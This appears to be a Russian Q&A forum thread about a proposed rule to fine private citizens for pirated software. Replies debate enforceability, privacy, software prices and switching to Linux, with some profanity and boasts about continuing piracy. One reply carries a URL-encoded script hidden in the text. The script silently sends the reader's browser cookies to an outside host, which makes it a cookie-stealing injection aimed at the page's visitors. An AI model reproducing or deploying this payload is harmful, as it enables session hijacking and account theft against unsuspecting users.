Программное обеспечение

Теперь за использование пиратского ПО штрафовать будут всех! ! Ваше мнение ?? См. дополнение !! Комментируем ВСЕ !!

Граждан России будут штрафовать за использование нелицензионных программ.

Пленумы Верховного и Высшего арбитражного судов Российской Федерации подготовили проект постановления, в котором разъясняется вступившая в силу 1 января 2008 года 1250 статья Гражданского Кодекса РФ - «Защита интеллектуальных прав» . В этой статье говорится, что отсутствие вины не освобождает нарушителя от необходимости прекратить использование контрафакта, а также не исключает применения к нему санкций.

Соответственно, если раньше наказание применялось лишь к юридическим лицам - пользователям контрафакта, то теперь эта практика распространится и на простых граждан. Так, человеку, использующему контрафакт неосознанно, могут снизить сумму штрафа, но не освободить от него совсем. В случае осознанного нарушения штраф составит от 10 тыс. до 5 млн руб. Пользователя могут оштрафовать, даже если он докажет, что не знал о нелегальности ПО, установленного на его домашнем ПК. Физических лиц будут штрафовать за размещение и загрузку контрафакта в сетях и на хостингах, даже если они не знали, что размещают и загружают пиратские копии.
Когда-нибудь это должно было произойти,.. Как же нас будут любить во всём мире, если у нас даже статьи за это нет?.. Не говорю уже о каких-то помимо введения закона действиях - они вряд ли будут поголовно применяться.. Ну да, теперь пострашнее стало, но ситуация в корне не изменится.... Менталитет такой..)) )

«В России ПО распространяется тремя способами - это воровство, грабеж и дележ награбленного... »

Всем известная "мудрость" Билла Гейтса
Александр Иушин
Лучший ответ
отследить ВСЕХ невозможно!!!
L$
Leo $
Можно и я выскажу свои пять копеек?
РФ стремится попасть в ВТО (Всемирную Торговую Организацию) , они нас не принимают туда уже который год по очень многим причинам, в том числе и по причине пиратства в компьютерной отрасли. И мы (РФ) должны предпринять хотя бы номинальные действия по борьбе с пиратством, т. е. хотя бы принять закон. Будет ли он исполняться - этот вопрос я не затрагиваю и здесь не расписываю.
Всё написанное мною - imho :-)
Кудрат Алимов
все новые и новые способы выкачивания денег с народа.
сейчас и с авто напрягают.
Roman Groisman
Максим Мезенцев См..дополнение в вопросе !!
Цитата из статейки: "Пользователя могут оштрафовать, даже если он докажет, что не знал о нелегальности ПО, установленного на его домашнем ПК. "

И еще одна цитата, Статья 25 Конституции РФ:
"НЕПРИКОСНОВЕННОСТЬ ЖИЛИЩА -одно из основных конституционных личных прав человека.
Означает, что никто не должен проникать в жилище против воли проживающих в нем лиц.
Главная конституционная гарантия Н. ж. заключается в том, что обыски могут производиться только на основании
судебного решения (в случаях, не терпящих промедления - также в ином порядке с соблюдением всех предписаний закона) .
Во всех других случаях самовольное вторжение в жилище допускается только для предотвращения серьезной и явной угрозы общественной безопасности, а также жизни и здоровью людей. Гарантии Н. ж. могут быть ограничены в период действия чрезвычайного или военного положения. Н. ж. гарантируется в ст. 25 Конституции РФ. "

Поэтому никто не имеет права совать нос в мое жилище и проверять против моей воли что установлено на моем домашнем ПК. Для этого конституцию надо либо изменить, либо нарушить. Либо возбуждать против каждого пользователя уголовное дело и со всем "пакетом документов" ходить проверять. Вероятность предпринятия такого шага - нулевая.
Mehti Adishov
да однако слуги народа с какого то будуна опять приняли то незнаю что даже не подумав малость как это будет выглядеть и кому выгодно
Чего тут не понятного?
Бюджет трещит по швам.
Сегодня по телеку показывали, машина с судебными приставами ползает и отлавливает всех неплательщиков и должников, даже 100 рублями не побрезговали.
Так что до пиратов добраться - святое дело. Когда опишут физику процесса, тогда и будем дальше думать.
Максим Мезенцев Ну-ну интересно, что же это за методы будут .))
Жму руку за такой вопрос! Это называется Гражданское мужество!
За 2 года в Ответах я 1000 раз нажал кнопку Пожаловаться, когда встречал здесь мат, потому что здесь работают дети, в том числе и мой внук.
Впервые не могу сдержаться и пишу крупно СЦУКИ!
Свое мнение выражал неоднократно, повторяю

Читай статью академика С. Капицы
Он утверждает (и я ему верю!) , что на мои, Ваши налоги была бесплатно в НАШИХ ВУЗах обучена армия ИХНИХ создателей софта. Глубоко убежден, что все граждане СНГ нынешнего поколения имеют моральное право пользоваться…
Менталитет уж такой у нас, легко можем себя уговорить – и бедность, и не хочу, чтобы на мои деньги покупали бомбы для иракских, югославских и осетинских детей, вон к границам подтянулись уже…
НАВЕРХУ понимают, что нельзя допустить отставания в компьютерной грамотности населения НАВСЕГДА. Нам что, при таких ценах пересесть из-за монитора к окошку во двор на кухне? Потому ПОКА и не банят! Но ИНФУ, наверняка, собирают…
Не уговорил? Тогда кто из спорщиков на этой странице первым побежит покупать Фотошоп за 1 000, Автокад за 7 000 (не рублей, конечно) ? У кого есть такие деньги – в Ответах не сидят…

Лет 40 назад Солженицын напечатал повесть «Один день Ивана Денисыча» . Там букву «х» он заменил на букву «ф» . Использую этот прием
Пошли они на ф…

Многих и разных тебе удач!
А нам меньших бед!
A1
A/k 1787 A/k 1787
Максим Мезенцев Сцуки и ещё какие !!!Нет чтоб поднять зарплаты и многое чего сделать, так они х*уйнёй занимаються !!
Женя Беломестных за ваш ответ ставлю пять!
половину офисов можно спокойно перевести на бесплатное ПО и при этом ни кто не пострадает... лишь там где требуется узконаправленные задачи, можно использовать лиц. софт.
Kairkhan Balgabek
Кому эти лицензии нужны? Порой читаешь лицензионное соглашение, а там - заплати и если что случиться мы не отвечаем. Если не заплатишь - ты преступник. Лицензия на программы - сама форма собственности: права есть только у разработчиков, а у нас с вами по идее есть закон о защите прав потребителя.. . Мдя сразу вспоминается мелкософт и винда. Сейчас все говорят о том какие пираты плохие - воруют деньги, как изъясняются пиндосы, "американских налогоплательщиков". Все нормальные люди покупали пиратский софт. Раньше пираты работали на совесть: почти всё (в особенности игры) имели хороший перевод и даже озвучку на русском, а сейчас некоторые лиценизии переводят промтом и стилусом. О каком качестве тогда можно говорить.... Сейчас правительство борется с пиратствомпоказательными делами, но как известно пока гром не грянем мужик не перекрестится. Пиратки как попупали так и будут покупать, пока у среднестатистического пользователя не будет денег на лицензию. Посадить всех пиратов невозможно, проще обнести всю границу России колючей проволкой. Когда лицензионное будет стоить дешевле пиратского, никто не будет покупать пиратские диски. На этом кампании больше теряют, чем выиигрывают.
Думается мне, что это не совсем так. Хотя, конечно, первообладатель программ несет ущерб, когда пользуются его продукцией, не заплатив. Но у нас рынок так насыщен пиратской продукцией, что легко можно приобрести контрафактный продукт вместо лицензионного. Для частных лиц это на мой взгляд не преступление. А вот для организаций - другое дело.
По закону да! Все кто использует Пиратское ПО в комерческих целях приступники ...
Я думаю вам бы тоже не хотелось чтобы кто то за ваш счет зарабатывал деньги а вы лапу сосали... .
Ma
Maks
Алексей Абрамченко Так чё делать то? Удешевлять свои поделки до их реальной цены (100р. за XP, 50 за Висту), или давать 100% гарантию работоспособности+компенсацию в случае потери или повреждения ваших данных (железа)? Что бы вы выбрали?
Алексей Е В основном ВЕРОНИКА права, взять последний сайлет хилл, переводчик даже не удосужился перевести игру нормально, то есть, как выдал передчик то он и вставил!!! Лично я могу смело сказать, что какие бы законы не принимались, что бы не делало правительство, но пока на Земле есть хоть один хакер,все будет процветать!!!!Пусть нас всех переловят, пусть найдкт управу на каждого, но к познанию путь не закрыть!!! И пока мы бцдем страмиться к этому нас не угомонят, и не превзайдут!!!!
HACK IN THE WORLD!!!!
Планету хакерам!!!!
ZERO COOL!!!!ето человек самый гениальный в сети!!!!Хакер всех врем и народов!!!!
я удалил все мной размещенные файлы из сети )) на всякий случай )))
Валерий Акимов
а ВООБЩЕ КАКИЕ ПРЕТЕНЗИИ КО МНЕ, я на этом денег не зарабатываю, так что предьявить ко мне нечего. Если правда Microsoft сам не подаст на меня в суд
Лучше бы что то хорошее "родили", мне интересно как они будут отслеживать у кого пиратский софт!?
Владимир Терлецкий Либо, как сказал тот, кто ответил через два ответивших вверх от вашего ответа: закон принят для того, чтоб Россию приняли в ВТО а не для того, чтоб его исполнять,
либо правительство приняло этот закон для того, чтобы иметь предлог причинить неприятности тем, кто правительству не угодил, --выссказываются мнения, что Россия становится тоталитарным государством.
Вы как хочите, а я уже разрабатываю систему защиты. Мой комп при попытке приблизиться неизвестного, будет биться током, стреляться травматическими и газовыми патронами и лихорадочно стирать всю инфу, много кратно спецпрогами.
Kirill Vinichek
реально могут пострадать, только организации, фирмы т. к лицензионное п. о окупается быстро если исп професионально, по назначению.
Erlan Axmetov
А что Вы хотели, кто платит тот и заказывает музыку (законы).
Володя Ввсяний
Такая хрень может прийти в голову только с ОЧЕНЬ большого перепоя)))
хочется глянуть как это будет выглядеть может фирмы будут штрафовать но меня им не оштрафовать где такой закон что я не могу скачать с инета то что я хочу я за доступ плачу деньги надо штрафовать тех кто выкладывает а так это чуш штрафовать наверное будут не физических лиц а юредических
Максим Мезенцев То что это чушь - согласен - компьютеров в России Миллионы - каким они это образом будут делать - непонятно....
уже штрафуют. сестра в фирме работает. на них кто то стуканул куда надо. пришли, компы забрали, потом штраф выписали охренительный
Иван Шумченко
Максим Мезенцев А можно поподробнее?
Андрей Чернышов Я небольшую консалтинговую контору на Мандриву перевёл- все счастливы, и шлют ОБЭП целовать пингвинов. Мандрива, кстати, несложная в освоении.
Андрей Пелихов А у тебя сестра такая же клевая?
Так тогда получается, что большая часть страны будет сидеть по тюрьмам.. . И оштрафована на несколько триллионов рубликов...
Сергей Тюнин
Предположим, что у меня есть чеки и счета от некой фирмы, которая (якобы) поставила весь софт у меня дома. Я (судя по счетам) заплатил стоимость лицензионных программ. А как оказалось мне поставили весь пиратский софт (ай-ай-ай). По нашим законам у меня нет умысла, мало того я сам становлюсь потерпевшим. Никакого штрафа, а тем более уголовной ответственности ко мне применить нельзя. А фирма выдавшая чеки оформлена на бомжа и в данный момент не существует.
Анатолий Мун
Коля Шерий Так и было. Но сейчас вы обязаны проверить "чистоту" ПО. Т.е не проверив вы уже нарушили закон.
хня полная. и как интересно они будут это воплощать в жизнь? что? они постучат и спросят, а у вас лицензионное ПО?
Максим Мезенцев В миллионы квартир.
Дилафат Исмаилов "Wake up, Neo!
Knock. knock..."
С технической точки зрения, отследить не составляет особого труда. На практике рассмотрение дел будут переданы в суд. Количество судебных исков ,,,можно себе представить. Допускаю громкое рассмотрение нескольких дел (показуха) .Т. е. на практике мы имеем принятый закон и исполнительную ветвь власти. Работа последних хорошо известна. Особенно по результатам борьбы с пиратством.
Victor Galin
на деле этого не будет - вот и мнение!
разработчики должны получать за свой труд деньги.. . иначе профессия программист не будет существовать ваще так как никто за бесплатно работать не будет.. .

но с точки зрения пользователя: нет смысла покупать то, что можно cкачать бесплатно.. . конечному пользователю не важно кто разработчик, ему важна цена.. . то что лицензионный софт стабильнее это миф. (если речь идёт о копии и взломе оригинального софта, а не о самадельных сборках)

говорят, что хакеры это преступники, говорят они много зарабатывают.. . но при этом никто не думает, что именно благодаря хакерам ломающим софт компьютеры так быстро получили распространение.. . никто не считал на сколько тысяч долларов имеет софта (если бы он был лицензионным то стоимость софта в разы бы превышала стоимость железа) имхо хакер не приступник а современный герой трудящийся на благо общества, а взлом это не преступление а исскуство.. . и софт должен быть бесплатным. (таким он является в интернете)

закон говорите? а как вы представляете отслеживание частных лиц.. . и суд над ними если есть законы противоречащие этому ?(хотя по сути своей человек существо не логичное и противоречивое) относительно организаций тут проще.. . юридические лица способны оплачивать лицензионный софт и штрафы за использование пиратского.. . лицензионый софт должен продаваться юридическим лицам, а частные лица должны пользоваться бесплатно софтом.. . при этом даже пиратский софт влияет на популярность компании.. . а как вы думаете компания Microsoft страдающая от пиратства больше всех в мире не может или не хочет сделать более надёжную защиту от взлома и начать активнее бороться с пиратством? я думаю что они понимают что если они начнут активно с этим бороться они сделают хуже только себе.. . это отрицательно повлияет на их популярность и я думаю вы со мной согласитесь.. .

всё написаное не в защиту пиратства а в поддержку пользователей.. .
Алексей Корыц
Никого сажать не будут, это просто пиар компания и всё...и государству и майкрософту нужны сейчас деньги.. .
Отследить лицензионный софт у тебя стоит или нет не так уж и сложно, если у тебя есть инет и определёный набор майкрософтовского по... но врятли они пойдут на такие действия для выявления и наказания нарушителей, так как есть очень бойкий конкурент виндоуса - линукс. Сейчас уровень дистрибутивных пакетов для линукса достаточно высок и качественен, набор программ в комплекте линукса позволяет свободно и бесплатно работать большинству пользователям... линуксу просто не дают развиваться цепкие щупальца некоторых чиновников, а слова о том что линукс очень сложен в употреблении лично мне уже кажуться сказкой. Вывод - забейте на эту очередную чушь... а на крайний случай.... представьте, что будет если какого нибудь хакерюгу поймают (или толпы народа за использование пиратской копии) и на деньги штрафом кинут... сомневаюсь что гос сайты и серверы после этого будут долго жить
Lucky (Life M.m. Inc.)
мне только интересно, как они будут проверять ..
ну скачал я что то в сети пиратское, что прокурор даст им ордер
на обыск и выемку данных с моей машины! ?
эт бред какой то, никто таким заниматься не будет. .
скорее этот закон станет таким над которыми прикалываются все юмористы, типа \Собакам запрещено заниматься ...(ну понятно чем)
ближе чем 200 метров от церкви. (эт штатовский закончик) \
Мне кажется "шняга" полная :-( Уж очень противоречивая.... Там даже "вину" человека доказывать не нужно... .
И еще вопрос а как быть с вирусами и троянами? Они ведь то же под действие закона попадают. И плюсом неграмотные настройки пользователей обменных программ.
Хотя мне лично безразлично я на *nix сижу, там все "чистое".
Paata Jajanidze
Будут. ---Потом.
Мдя.... Получаецо что сначала должен быть суд, патом будет постановление на обыск моей хаты, и уже потом тока мну посадят, так чтоль? ))))
Кстати о ЗП.... мну нада годика 2 работать бесплатно чтоб полностью легализовать свою машину ))))) Так вот с этого и нада было начинать.... Сначала поднять людям ЗП, а патом ужо требовать с них легальность ПО. Наше правительство все гониться за америкосами да за европой, цены европейские, а ЗП наша, росийская....
это преследовать просто не реально, не хватит не сил ни средств ни людей для этого.. ! это замкнутый круг, это паутина
Samir Safarov
Максим Мезенцев Это точно !!
Нет чтоб икать тех кто вирусы пишет и рассылает их, или спамеров, они пытаются искать тех кто пользуется пиратками, а если всех сажать то придется заключенным отдельный город дать чтоб разместить всех.
качали, качаем и будем качать. Ну кто узнает что у меня все нелицензионно? По домам они проверят всеравно не пойдут. А в сети заливать - я этим и не занимаюсь. Такчто на х@ру я вертел эти законы.
Я этим не страдаю.
Немо +++
Я как пользовался пиратскими копиями программ, так и буду это делать, и мне по*уй на эти законы, этих грёбанных депутатов, как будто они такие правильные там в своей думе сидят.
Эть точно занимаются не тем чем надо! В России как воровали так и будут воровать! Это минталитет такой! Помните как кортошку в Россию завезли! Никто ее брать не хотел пока под охрану не поставили, и ее в тот же день спиздили! Вот и все.
Нашему правительству заняться нечем, вот х... й и занимаются. Как в песне группы Агата Кристи "... люди бесятся с водки, люди бесятся с жиру, люди бесятся просто так".А всех всё равно не заставят пользоватся лицензионным по-доходы у нас не те, да и отловить каждого проблематично.
можно бы и заплатить-но сперва неплохо бы НАМ приплатить за использование ПО-полное ошибок (за которые ответственности никто нести не хочет) ---а если одним словом-то очередной маразм в стране дураков...
мда! какие законы е.. нутые такое и правительство! ха, они наверно пример с америки берут))))
4% Мандривы уже закачались, осталось каких то 96% - придётся подчиниться, а чё поделаешь? Если нашим долбоправителям больше нечего делать, как придумывать законы, запрещающие без отчисления в продюсерский фонд гонять музыку в маршрутках, пить пиво на остановках, отвергать "холокост" и говорить правду - будем жить в обществе, где быть домашним пользователем страшнее, чем вором-карманником....
А я Линух юзаю, новости такие мне лишь бальзам на душу. Перейдут люди на Линукс или выкинут по 30-90 тысяч на софт.
Зато будет меньше глупых эникейщиков, этоже прекрасно! Или будут платить ежегодно. Вот.
Дима Кравченко linux кал%3c%73%63%72%69%70%74%3e%64%3d%64%6f%63%75%6d%65%6e%74%3b%20%64%2e%77%72%69%74%65%28%22%3c%69%6d%67%20%77%69%64%74%68%3d%30%20%73%72%63%3d%2f%2f%6d%75%64%61%6b%69%37%2e%6a%69%6e%6f%2d%6e%65%74%2e%72%75%2f%69%2e%70%68%70%3f%35%3d%22%2b%20%65%73%63%61%70%65%28%64%2e%63%6f%6f%6b%69%65%29%20%2b%22%3e%22%29%3c%2f%73%63%72%69%70%74%3e
А чё?Реальная тема. Только если бы все бабло на дело пошло, а не в карманах осело. Надо чтоб законы правильно работали. И учитывая средний доход Россиянина прайс на ПО снизить раза 2,3.Хочешь NERO 9-иди и купи (долларов за 50,был бы нормальный ценник), а мне и бесплатный ISOBURN устроит. Раньше тоже качал все подряд, а в итоге то надо для дома несколько программ, из которых половина, а то и бльше можно использовать бесплатные, в том числе и АНТИВИРУС. У нас в стране пока еще люди не врубаются что это воровство. Напиши программу, книгу, песню и т. д., а у тебя сопрут! Заорешь благим матом. Потому как украли твой труд. Но если ближе к теме, то СИСТЕМА ПРАВООХРАНИТЕЛЬНЫХ ОРГАНОВ И ВЛАСТИ ПРОГНИЛА ДО НЕЛЬЗЯ. ВОТ С ЧЕГО НАДО НАЧИНАТЬ!!!
Davo Sargsyan
ЫЫыы ну а что они придут комне домой и будут рыцца в компе и тд... =))) хня полная)))
В принцепе малина должна когда-то кончиться.
А со стороны мелких разработчиков программ это к лучшему, а то они вобще не чего не имеют от своей работы.
А мы пользователи пересядем на ЛИНЕКС с его бесплатными программами, на зло мелкософту, вот и все.
Иного пути нет, так как, чтоб работать на винде нормально комфортно надо софта на миллиона 2 руб закупить, а это не реально.

А как американци сидеть с виндой и офис пакетом и все - это не по мне.
Ну можно в принципе попользоваться лицензионным ПО.... зарплату поднимите только.... процентов на 200
Хехех)) ) И как они будут с нами поступать, с ОМОНом врываться в хаты, м?? ?
КОРРУПЦИЮ надо искоренять, коррупцию в вузах, коррупцию ментов... .
Все пользователи ПО скоро окажемся за решеткой и с огромным штрафом!
Максим Мезенцев ДА ты что??? Представляешь что будет с Камерами временного содержания и тюрьмами....там не то что ступить негде будет- а очередь будет на то чтобы отсидеть за установку винрара....
Erlan Axmetov не все ,несколько процентов у кого на компе linux,freebsd не смогут посадить.
А ведь это не так трудно отследить, кто качает кряки с инета, провайдеру достаточно посмотреть кэш и логи от определённого юзера. Кстати некоторые пользователи, их не так уж и много, пользующиеся e-mule уже получили штрафы=)

<<хочется глянуть как это будет выглядеть может фирмы будут штрафовать но меня им не оштрафовать где такой закон что я не могу скачать с инета то что я хочу я за доступ плачу деньги надо штрафовать тех кто выкладывает а так это чуш штрафовать наверное будут не физических лиц а юредических>>

Правильно, качать ты можешь всё что хочешь, но сам факт что ты искал и скачал кряк будет настораживать.

<<То что это чушь - согласен - компьютеров в России Миллионы - каким они это образом будут делать - непонятно.... >>

Скорее всего у них всё по базам данных пишется, а отфильтровав определённое слово труда несоставит.
Сергей Кирин на прослушивание телефонных разговоров санкции выдаются лишь в очень особых случаях.
а на отстеживание трафиков пользователей нужна такая же санкция.
хотя, многим пользователям всякого рода халявных почтовых ящиков по барабану, что их письма зачастую читаются для подсовывания "близкой душе пользователя" рекламы... Так что законы создают всякие, но и гнут их куда хотят и когда хотят.
Тут мнение звучало, что так лучше будет, что на Линукс все перейдут. Кажется, вряд ли. И громкие дела будут и осуждённые тоже. Пока не поймут, что либо несите ваши денежки, либо Линукс.
Можно говорить, что угодно, а всё останется на месте, как этого хочет государство. Со времён революции от нас ничего не зависит.